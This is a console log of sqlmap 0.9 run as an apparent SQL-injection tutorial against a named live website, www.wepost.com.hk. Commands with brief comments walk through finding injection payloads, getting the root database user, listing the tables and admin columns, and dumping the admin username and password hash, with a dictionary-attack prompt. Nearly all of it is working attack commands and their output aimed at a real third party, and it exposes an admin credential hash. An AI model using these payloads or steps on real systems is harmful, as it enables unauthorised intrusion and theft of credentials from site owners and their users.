D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>